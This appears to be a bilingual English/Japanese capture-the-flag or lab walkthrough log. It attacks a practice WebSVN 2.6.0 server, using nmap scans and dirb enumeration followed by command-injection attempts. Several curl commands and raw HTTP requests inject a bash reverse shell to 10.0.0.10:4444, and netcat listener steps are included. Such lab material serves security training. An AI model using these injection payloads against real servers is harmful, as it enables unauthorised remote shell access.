The target is at: 10.0.0.15
What is the name and the version of the vulnerable web application?

ターゲットは10.0.0.15です。
脆弱なWebアプリケーションの
名前とバージョンは何ですか？


user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ nmap --script vuln -p 22,80 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-20 00:07 UTC
Nmap scan report for 10.0.0.15
Host is up (0.00046s latency).

PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.0.0.15
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.0.0.15:80/
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/search.php?repname=FirstRepo&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/search.php?repname=FirstRepo&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/search.php?repname=FirstRepo&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/search.php?repname=FirstRepo&amp;
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/search.php?repname=FirstRepo&amp;
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/?
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/?
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/?
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/?
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/?
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;
|     Form id: search
|     Form action: log.php?repname=FirstRepo&path=%2F&
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/revision.php?repname=FirstRepo&amp;isdir=1&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/revision.php?repname=FirstRepo&amp;isdir=1&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/revision.php?repname=FirstRepo&amp;isdir=1&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;ignorews=1
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;ignorews=1
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;ignorews=1
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;manualorder=1
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;manualorder=1
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/comp.php?repname=FirstRepo&amp;compare%5B%5D=@HEAD&amp;compare%5B%5D=@HEAD&amp;manualorder=1
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;rev=HEAD&amp;peg=HEAD
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;rev=HEAD&amp;peg=HEAD
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;rev=HEAD&amp;peg=HEAD
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;rev=HEAD&amp;peg=HEAD
|     Form id: search
|     Form action: search.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/listing.php?repname=FirstRepo&amp;rev=HEAD&amp;peg=HEAD
|     Form id: compare
|     Form action: comp.php?repname=FirstRepo&
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: template
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: language
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: revision
|     Form action: 
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: search
|     Form action: log.php?repname=FirstRepo&path=%2F&
|     
|     Path: http://10.0.0.15:80/log.php?repname=FirstRepo&amp;path=%2F&amp;
|     Form id: compare
|_    Form action: comp.php?repname=FirstRepo&
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.php: RSS or Atom feed
|   /log.php: Logs
|   /cache/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /include/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /javascript/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /templates/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 35.66 seconds
user@ip-10-0-0-10:~$ 

ブラウザでポート 80 で Web サイトを開き、
Web サイトのバージョンに関する情報を検索します。


user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ nmap -sV -A 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-20 09:21 UTC
Nmap scan report for 10.0.0.15
Host is up (0.00029s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title:        WebSVN         &ndash; FirstRepo            &ndash; /  
|_Requested resource was listing.php?repname=FirstRepo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ nmap --script http-svn-info,http-config-backup -p 80 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-20 09:23 UTC
Nmap scan report for 10.0.0.15
Host is up (0.00087s latency).

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ nmap --script http-enum,http-sitemap-generator -p 80 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-20 09:23 UTC
Nmap scan report for 10.0.0.15
Host is up (0.0012s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /rss.php: RSS or Atom feed
|   /log.php: Logs
|   /cache/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /include/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /javascript/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /templates/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| http-sitemap-generator: 
|   Directory structure:
|     /
|       Other: 1; php: 6
|     /javascript/
|       js: 4
|     /templates/calm/
|       css: 1
|     /templates/calm/images/
|       ico: 1
|   Longest directory structure:
|     Depth: 3
|     Dir: /templates/calm/images/
|   Total files found (by extension):
|_    Other: 1; css: 1; ico: 1; js: 4; php: 6

Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
user@ip-10-0-0-10:~$ 


ser@ip-10-0-0-10:~$ curl http://10.0.0.15/rss.php | grep -i "user\|password\|svn"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   542  100   542    0     0  21464      0 --:--:-- --:--:-- --:--:-- 21680
<?xml version="1.0" encoding="utf-8"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>FirstRepo &#x2013; /</title><description>WebSVN RSS feed &#x2013; </description><lastBuildDate>Mon, 20 Oct 2025 09:25:48 +0000</lastBuildDate><generator>WebSVN 2.6.0</generator><language>en</language><link>http://10.0.0.15/log.php?repname=FirstRepo&amp;path=%2F&amp;max=40&amp;</link><atom:link href="http://10.0.0.15/rss.php" rel="self" type="application/rss+xml" />
user@ip-10-0-0-10:~$ 

Locate an appropriate exploit for this web server. According to the exploit, what is the vulnerable web page?

この Web サーバーの適切なエクスプロイトを見つけます。
エクスプロイトによると、脆弱な Web ページは何ですか?
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ dirb http://10.0.0.15 -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Oct 20 09:34:30 2025
URL_BASE: http://10.0.0.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.0.15/ ----
+ http://10.0.0.15/browse.php (CODE:302|SIZE:0)                                                                                                                        
+ http://10.0.0.15/comp.php (CODE:200|SIZE:6335)                                                                                                                       
+ http://10.0.0.15/diff.php (CODE:200|SIZE:5430)                                                                                                                       
+ http://10.0.0.15/dl.php (CODE:403|SIZE:38)                                                                                                                           
+ http://10.0.0.15/index.php (CODE:302|SIZE:0)                                                                                                                         
+ http://10.0.0.15/listing.php (CODE:200|SIZE:6365)                                                                                                                    
+ http://10.0.0.15/log.php (CODE:200|SIZE:7279)                                                                                                                        
+ http://10.0.0.15/rss.php (CODE:200|SIZE:542)                                                                                                                         
+ http://10.0.0.15/search.php (CODE:200|SIZE:6363)                                                                                                                     
                                                                                                                                                                       
-----------------
END_TIME: Mon Oct 20 09:34:34 2025
DOWNLOADED: 4612 - FOUND: 9
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ 


ターゲットの Web アプリケーションを利用して、
/var/www ディレクトリにあるフラグ ファイル
の内容を取得します。


ご覧のとおり、このエクスプロイトの
ペイロードはリバース シェルを開始
するように設定されています。
このエクスプロイトを利用するには、
ホストに接続するようにペイロードを
構成し、逆接続をキャプチャするため
にホスト上にリスナーを設定する
必要があります。


bash -c 'bash -i >& /dev/tcp/10.0.0.10/4444 0>&1'


http://10.0.0.15/search.php?search=; bash -c 'bash -i >& /dev/tcp/10.0.0.10/4444 0>&1';&repname=FirstRepo

http://10.0.0.15/log.php?path=;[URLエンコードされたリバースシェルコマンド];&repname=FirstRepo


http://10.0.0.15/search.php?repname=FirstRepo&search=bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261%27

curl 'http://10.0.0.15/search.php?search=; bash -i >& /dev/tcp/10.0.0.10/4444 0>&1;%23&repname=FirstRepo'

curl 'http://10.0.0.15/search.php?repname=; bash -i >& /dev/tcp/10.0.0.10/4444 0>&1;%23&repname=FirstRepo'


<form method="get" action="" id="template"><input type="hidden" name="search" value="; bash -i >& /dev/tcp/10.0.0.10/4444 0>&1 ;#"/>

<div id="searchcss"><form method="get" action="search.php?repname=FirstRepo&amp;" id="search"><input type="hidden" name="repname" value="FirstRepo" /><div>Search <input type="text" size="20" name="search" placeholder="; bash -i >& /dev/tcp/10.0.0.10/4444 0>&1 ;#" /><span class="submit"><input type="submit" value="Search" /></span></div></form></div>

; bash -i >& /dev/tcp/10.0.0.10/4444 0>&1 ;#


GET /log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1 HTTP/1.1
Host: 10.0.0.15
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.0.0.15/log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

curl 'http://10.0.0.15/log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1'

ser@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ curl 'http://10.0.0.15/log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <meta http-equiv="generator" content="WebSVN 2.6.0" /> <!-- leave this for stats -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" type="image/x-icon" href="./templates/calm/images/favicon.ico" />
  <link type="text/css" href="./templates/calm/styles.css" rel="stylesheet" media="screen" />
  <link rel='alternate' type='application/rss+xml' title='WebSVN RSS' href='rss.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;' />
  <!--[if gte IE 5.5000]>
  <script type="text/javascript" src="./javascript/ie-png-transparency.js"></script>
  <style type="text/css" media="screen">
  tbody tr td { padding:1px 0 }
  #wrap h2 { padding:10px 5px 0 5px; margin-bottom:-8px }
  </style>
  <![endif]-->
  <title>
       WebSVN
         &ndash; FirstRepo
            &ndash; Log
            &ndash; /
  </title>
</head>
<body id="log">
<div id="container">
	<div id="select">
		<form method="get" action="" id="template"><input type="hidden" name="repname" value="FirstRepo"/><input type="hidden" name="path" value="/"/><input type="hidden" name="isdir" value="1"/><input type="hidden" name="sr" value="0"/><input type="hidden" name="er" value="1"/><input type="hidden" name="max" value="40"/><input type="hidden" name="search" value="; bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1 ;#"/><input type="hidden" name="all" value="1"/><select name="template" onchange="javascript:this.form.submit();"><option value="BlueGrey">BlueGrey</option><option value="calm" selected="selected">calm</option><option value="Elegant">Elegant</option></select><noscript><input type="submit" value="Go" /></noscript></form>
		<form method="get" action="" id="language"><input type="hidden" name="repname" value="FirstRepo"/><input type="hidden" name="path" value="/"/><input type="hidden" name="isdir" value="1"/><input type="hidden" name="sr" value="0"/><input type="hidden" name="er" value="1"/><input type="hidden" name="max" value="40"/><input type="hidden" name="search" value="; bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1 ;#"/><input type="hidden" name="all" value="1"/><select name="language" onchange="javascript:this.form.submit();"><option value="ca">Catal&agrave;-Valenci&agrave; &ndash; Catalan</option><option value="zh-CN">&#20013;&#25991; &ndash; Chinese (Simplified)</option><option value="zh-TW">&#20013;&#25991; &ndash; Chinese (Traditional)</option><option value="cs">&#268;esky &ndash; Czech</option><option value="da">Dansk &ndash; Danish</option><option value="nl">Nederlands &ndash; Dutch</option><option value="en" selected="selected">English &ndash; English</option><option value="fi">Suomi &ndash; Finnish</option><option value="fr">Fran&ccedil;ais &ndash; French</option><option value="de">Deutsch &ndash; German</option><option value="he-IL">&#1506;&#1489;&#1512;&#1497;&#1514; &ndash; Hebrew</option><option value="hin">&#2361;&#2367;&#2306;&#2342;&#2368; &ndash; Hindi</option><option value="hu">Magyar &ndash; Hungarian</option><option value="id">Bahasa Indonesia &ndash; Indonesian</option><option value="it">Italiano &ndash; Italian</option><option value="ja">&#26085;&#26412;&#35486; &ndash; Japanese</option><option value="ko">&#54620;&#44397;&#50612; &ndash; Korean</option><option value="mk">&#1052;&#1072;&#1082;&#1077;&#1076;&#1086;&#1085;&#1089;&#1082;&#1080; &ndash; Macedonian</option><option value="mr">&#2350;&#2352;&#2366;&#2336;&#2368; &ndash; Marathi</option><option value="no">Norsk &ndash; Norwegian</option><option value="pl">Polski &ndash; Polish</option><option value="pt">Portugu&ecirc;s &ndash; Portuguese</option><option value="pt-BR">Portugu&ecirc;s &ndash; Portuguese (Brazil)</option><option value="ru">&#1056;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081; &ndash; Russian</option><option value="sk">Sloven&#269;ina &ndash; Slovak</option><option value="sl">Sloven&#353;&#269;ina &ndash; Slovenian</option><option value="es">Espa&ntilde;ol &ndash; Spanish</option><option value="sv">Svenska &ndash; Swedish</option><option value="tr">T&uuml;rk&ccedil;e &ndash; Turkish</option><option value="uk">&#1059;&#1082;&#1088;&#1072;&#1111;&#1085;&#1089;&#1100;&#1082;&#1072; &ndash; Ukrainian</option><option value="uz">O&euml;zbekcha &ndash; Uzbek</option></select><noscript><input type="submit" value="Go" /></noscript></form>
	</div>
	<h1><a href=".?" title="Subversion Repositories">Subversion Repositories</a>
		<span><a href="listing.php?repname=FirstRepo&amp;">FirstRepo</a></span>
	</h1>
  <h2 id="pathlinks"><a href="listing.php?repname=FirstRepo&amp;path=%2F&amp;" class="root"><span>(root)</span></a>/ &ndash; Rev 0</h2>
  <div id="revjump"><form method="get" action="" id="revision"><input type="hidden" name="repname" value="FirstRepo" /><div>Rev <input type="text" size="5" name="rev" placeholder="HEAD" /><span class="submit"><input type="submit" value="Go" /></span></div></form></div>
  <p>
    <span class="changes"><a href="log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;sr=0&amp;er=1&amp;max=40&amp;search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&amp;all=1&amp;showchanges=1">Show changed files</a></span> &#124;
    <span class="listing"><a href="listing.php?repname=FirstRepo&amp;path=%2F&amp;#a6666cd76f96956469e7be39d750cc7d9">Directory listing</a></span>
    &#124; <span class="feed"><a href="rss.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;">RSS feed</a></span>
  </p>
  
  <div id="info">
    <h2>Filtering Options</h2>
    <form method="get" action="log.php?repname=FirstRepo&amp;path=%2F&amp;" id="search"><input type="hidden" name="repname" value="FirstRepo" /><input type="hidden" name="path" value="/" /><input type="hidden" name="isdir" value="1" />
    <table>
      <tbody>
        <tr>
          <th scope="col"><label>From rev</label></th>
          <th scope="col"><label>To rev</label></th>
          <th scope="col"><label>Max revs</label></th>
        </tr>
        <tr>
          <td class="revcomp"><input name="sr" size="5" value="0" /></td>
          <td class="revcomp"><input name="er" size="5" value="1" /></td>
          <td class="revcomp"><input name="max" size="5" value="40" /></td>
        </tr>
        <tr><th scope="col" colspan="3"><label>Search history for</label></th></tr>
        <tr><td colspan="3"><input name="search" value="; bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1 ;#" /></td></tr>
        <tr><th scope="col" colspan="3"><label>Show All</label></th></tr>
        <tr><td colspan="3" class="all"><input type="checkbox" name="all" value="1" checked="checked" /></td></tr>
      </tbody>
    </table>
    <p class="submit"><input type="submit" value="Go" />
      <a href="log.php?repname=FirstRepo&amp;path=%2F&amp;isdir=1&amp;">Clear current filter</a>
    </p>
    </form>
  </div>
  
  <div id="wrap">
     There are no logs matching your query
  
  
  <p class="pagelinks"></p>
  <p></p>
  
  </div>
<script type="text/javascript" src="./javascript/compare-checkboxes.js"></script></div>
<div id="footer">
  <p style="padding:0; margin:0"><small>Powered by <a href="https://websvnphp.github.io/">WebSVN</a> 2.6.0 and <a href="http://subversion.apache.org">Apache Subversion</a> 1.13.0 &nbsp; &nbsp; &#x2713; <a href="http://validator.w3.org/check?uri=http://10.0.0.15/log.php?repname=FirstRepo%26path=%2F%26isdir=1%26sr=0%26er=1%26max=40%26search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23%26all=1%26template=%26language=en">XHTML</a> &amp; <a href="http://jigsaw.w3.org/css-validator/validator?uri=http://10.0.0.15/log.php?repname=FirstRepo%26path=%2F%26isdir=1%26sr=0%26er=1%26max=40%26search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23%26all=1%26template=%26language=en">CSS</a></small></p>
</div>
</body>
</html>
user@ip-10-0-0-10:~$ 

Second, initiate a listener and then execute the exploit in a new terminal tab. You can utilize the netcat command by typing nc -nlvp <port> (validate that the port is the same as mentioned in the exploit).

次に、リスナーを開始し、新しい
ターミナル タブでエクスプロイト
を実行します。
 nc -nlvp <port> と入力すると、
netcat コマンドを利用できます
 (ポートがエクスプロイトで
言及されているものと同じである
ことを検証します)。


;%20bash%20-i%20%3E%26%20/dev/tcp/10.0.0.10/4444%200%3E%261%20;%23

GET /log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1 HTTP/1.1
Host: 10.0.0.15
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.0.0.15/log.php?repname=FirstRepo&path=%2F&isdir=1&sr=0&er=1&max=40&search=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23&all=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ curl 'http://10.0.0.15/revision.php?repname=FirstRepo&rev=;%20bash%20-i%20%3E%26%20/dev/tcp/10.0.0.10/4444%200%3E%261%20;%23'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <meta http-equiv="generator" content="WebSVN 2.6.0" /> <!-- leave this for stats -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" type="image/x-icon" href="./templates/calm/images/favicon.ico" />
  <link type="text/css" href="./templates/calm/styles.css" rel="stylesheet" media="screen" />
  <link rel='alternate' type='application/rss+xml' title='WebSVN RSS' href='rss.php?repname=FirstRepo&amp;path=%2F&amp;' />
  <!--[if gte IE 5.5000]>
  <script type="text/javascript" src="./javascript/ie-png-transparency.js"></script>
  <style type="text/css" media="screen">
  tbody tr td { padding:1px 0 }
  #wrap h2 { padding:10px 5px 0 5px; margin-bottom:-8px }
  </style>
  <![endif]-->
  <title>
       WebSVN
         &ndash; FirstRepo
            &ndash; /
  </title>
</head>
<body id="revision">
<div id="container">
	<div id="select">
		<form method="get" action="" id="template"><input type="hidden" name="repname" value="FirstRepo"/><input type="hidden" name="rev" value="; bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1 ;#"/><select name="template" onchange="javascript:this.form.submit();"><option value="BlueGrey">BlueGrey</option><option value="calm" selected="selected">calm</option><option value="Elegant">Elegant</option></select><noscript><input type="submit" value="Go" /></noscript></form>
		<form method="get" action="" id="language"><input type="hidden" name="repname" value="FirstRepo"/><input type="hidden" name="rev" value="; bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1 ;#"/><select name="language" onchange="javascript:this.form.submit();"><option value="ca">Catal&agrave;-Valenci&agrave; &ndash; Catalan</option><option value="zh-CN">&#20013;&#25991; &ndash; Chinese (Simplified)</option><option value="zh-TW">&#20013;&#25991; &ndash; Chinese (Traditional)</option><option value="cs">&#268;esky &ndash; Czech</option><option value="da">Dansk &ndash; Danish</option><option value="nl">Nederlands &ndash; Dutch</option><option value="en" selected="selected">English &ndash; English</option><option value="fi">Suomi &ndash; Finnish</option><option value="fr">Fran&ccedil;ais &ndash; French</option><option value="de">Deutsch &ndash; German</option><option value="he-IL">&#1506;&#1489;&#1512;&#1497;&#1514; &ndash; Hebrew</option><option value="hin">&#2361;&#2367;&#2306;&#2342;&#2368; &ndash; Hindi</option><option value="hu">Magyar &ndash; Hungarian</option><option value="id">Bahasa Indonesia &ndash; Indonesian</option><option value="it">Italiano &ndash; Italian</option><option value="ja">&#26085;&#26412;&#35486; &ndash; Japanese</option><option value="ko">&#54620;&#44397;&#50612; &ndash; Korean</option><option value="mk">&#1052;&#1072;&#1082;&#1077;&#1076;&#1086;&#1085;&#1089;&#1082;&#1080; &ndash; Macedonian</option><option value="mr">&#2350;&#2352;&#2366;&#2336;&#2368; &ndash; Marathi</option><option value="no">Norsk &ndash; Norwegian</option><option value="pl">Polski &ndash; Polish</option><option value="pt">Portugu&ecirc;s &ndash; Portuguese</option><option value="pt-BR">Portugu&ecirc;s &ndash; Portuguese (Brazil)</option><option value="ru">&#1056;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081; &ndash; Russian</option><option value="sk">Sloven&#269;ina &ndash; Slovak</option><option value="sl">Sloven&#353;&#269;ina &ndash; Slovenian</option><option value="es">Espa&ntilde;ol &ndash; Spanish</option><option value="sv">Svenska &ndash; Swedish</option><option value="tr">T&uuml;rk&ccedil;e &ndash; Turkish</option><option value="uk">&#1059;&#1082;&#1088;&#1072;&#1111;&#1085;&#1089;&#1100;&#1082;&#1072; &ndash; Ukrainian</option><option value="uz">O&euml;zbekcha &ndash; Uzbek</option></select><noscript><input type="submit" value="Go" /></noscript></form>
	</div>
	<h1><a href=".?" title="Subversion Repositories">Subversion Repositories</a>
		<span><a href="listing.php?repname=FirstRepo&amp;">FirstRepo</a></span>
	</h1>
<h2 id="pathlinks"><a href="listing.php?repname=FirstRepo&amp;path=%2F&amp;" class="root"><span>(root)</span></a>/ &ndash; Rev 0</h2>
